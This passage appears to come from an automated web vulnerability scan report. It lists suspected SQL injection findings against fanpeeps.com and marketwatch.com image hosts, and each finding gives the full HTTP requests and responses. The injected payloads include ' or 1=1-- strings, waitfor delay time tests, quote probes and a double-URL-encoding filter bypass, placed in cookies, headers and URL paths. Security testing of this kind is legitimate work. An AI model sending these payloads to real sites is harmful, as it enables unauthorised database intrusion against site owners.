Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.72. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0,0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.73. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18151

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.74. http://fanpeeps.com/twitterlib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 17071916'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js17071916'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17399

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.75. http://fanpeeps.com/twitterlib.js [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 14321639'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=14321639'%20or%201%3d1--%20

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17419

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.76. http://fanpeeps.com/twitterlib.js [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload 15737200'%20or%201%3d1--%20 was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15737200'%20or%201%3d1--%20
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17433

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.77. http://fanpeeps.com/twitterlib.js [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17401

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.78. http://fanpeeps.com/twitterlib.js [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17327

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527%2527; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 53253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.79. http://fanpeeps.com/twitterlib.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.80. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19831040'%20or%201%3d1--%20 and 19831040'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/images19831040'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:18:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/images19831040'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:18:35 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.81. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/images/favicon.ico

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/images/favicon.ico'%20and%201%3d1--%20 HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:18:36 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/images/favicon.ico'%20and%201%3d2--%20 HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:18:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.82. http://i3.marketwatch.com/MW5/content/story/css/story-typography.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i3.marketwatch.com
Path:   /MW5/content/story/css/story-typography.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /MW5'/content/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; rsi_csl=; rsi_segs=; BIZO=biz=1053&; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:25:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<h2>HTTP Error 404 - File or directory not found.<br>
...[SNIP]...

Request 2

GET /MW5''/content/story/css/story-typography.css?v3 HTTP/1.1
Host: i3.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
